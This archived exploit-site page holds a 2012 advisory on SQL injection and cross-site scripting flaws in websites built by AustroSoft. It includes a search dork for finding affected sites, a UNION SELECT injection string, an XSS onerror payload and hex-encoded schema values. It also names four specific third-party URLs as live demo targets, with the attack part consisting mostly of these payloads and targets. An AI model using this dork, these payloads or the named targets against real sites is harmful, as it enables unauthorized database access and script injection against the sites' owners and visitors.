exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

AustroSoft Cross Site Scripting / SQL Injection

AustroSoft Cross Site Scripting / SQL Injection
Posted Nov 7, 2012
Authored by Ur0b0r0x

Sites designed by AustroSoft suffer from cross site scripting and remote SQL injection vulnerabilities. Note that this finding houses site-specific data.

tags | exploit, remote, vulnerability, xss, sql injection
SHA-256 | 29972de0faabede6015656e5129a45200fa2d42f1ced224324da8325154e6484

AustroSoft Cross Site Scripting / SQL Injection

Change Mirror Download
  _    _ _____   ___  ____   ___  _____   _____   __
| | | | __ \ / _ \| _ \ / _ \| __ \ / _ \ \ / /
| | | | |__) | | | | |_) | | | | |__) | | | \ V /
| | | | _ /| | | | _ <| | | | _ /| | | |> <
| |__| | | \ \| |_| | |_) | |_| | | \ \| |_| / . \
\____/|_| \_\\___/|____/ \___/|_| \_\\___/_/ \_\

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
INDEPENDENT SECURITY RESEARCHER
PENETRATION TESTING SECURITY
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

# Author: Ur0b0r0x
# Tiwtte: @Ur0b0r0x
# Email: ur0b0r0x_4n1@live.com
# Line: GreyHat


# Exploit Title: AustroSoft - SQL Injection / Cross-Site Scripting Vulnerabilities
# Dork: intext:Construido y Desarrollado por AustroSoft
# Date: 06/11/2012
# Author: Ur0b0r0x
# Url Vendor: http://www.austrosoft.com.ec/
# Vendor Name: AustroSoft
# Tested On: Backtrack R3 / Linux Mint
# Type: php

------------------- Agreement --------------------
[02/11/2012] - Vulnerability discovered
[05/11/2012] - Vendor notified Dont responsed
[06/11/2012] - Public disclosure
--------------------------------------------------

# Expl0it/P0c ###################
http://site.com/*.*= < Sql Vulnerability Path >
http://site.com/*.*= < Xss Vulnerability Path >


# Exploit/Comand/Sql=> +union+select+1,2,3,4,5,6--+
# Exploit/Comand/Xss=> "><img src=x onerror=alert("ur0b0r0x");>
# Payload/Comand/Sql=> table_schema=0x45F62771736573616C61667273 / table_name=0x6E6536C6574657461736

# Demo_Xss_Sql_Vulnerabilities
http://www.mpa.com.ec/tesis.php?con=1'
http://www.sensorvital.com/descripcion.php?codigo=1'
http://www.maestriaenconstrucciones.com.ec/convocatoria1/?Menu=1'
http://www.austrosoft.com.ec/proyectos/caeazuay.org/?IDNOTICIA=1'

# Gr3t'x #########################
>> | Mr.Pack | Nick Nitrous | Revolution_Hackers | Dylan Irzi | R00tc0d3r's | SecurityDev | Mafia Dz | Algerian Hacker |
>> And All H4x0r5
Login or Register to add favorites

File Archive:

June 2023

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jun 1st
    18 Files
  • 2
    Jun 2nd
    13 Files
  • 3
    Jun 3rd
    0 Files
  • 4
    Jun 4th
    0 Files
  • 5
    Jun 5th
    32 Files
  • 6
    Jun 6th
    39 Files
  • 7
    Jun 7th
    22 Files
  • 8
    Jun 8th
    0 Files
  • 9
    Jun 9th
    0 Files
  • 10
    Jun 10th
    0 Files
  • 11
    Jun 11th
    0 Files
  • 12
    Jun 12th
    0 Files
  • 13
    Jun 13th
    0 Files
  • 14
    Jun 14th
    0 Files
  • 15
    Jun 15th
    0 Files
  • 16
    Jun 16th
    0 Files
  • 17
    Jun 17th
    0 Files
  • 18
    Jun 18th
    0 Files
  • 19
    Jun 19th
    0 Files
  • 20
    Jun 20th
    0 Files
  • 21
    Jun 21st
    0 Files
  • 22
    Jun 22nd
    0 Files
  • 23
    Jun 23rd
    0 Files
  • 24
    Jun 24th
    0 Files
  • 25
    Jun 25th
    0 Files
  • 26
    Jun 26th
    0 Files
  • 27
    Jun 27th
    0 Files
  • 28
    Jun 28th
    0 Files
  • 29
    Jun 29th
    0 Files
  • 30
    Jun 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close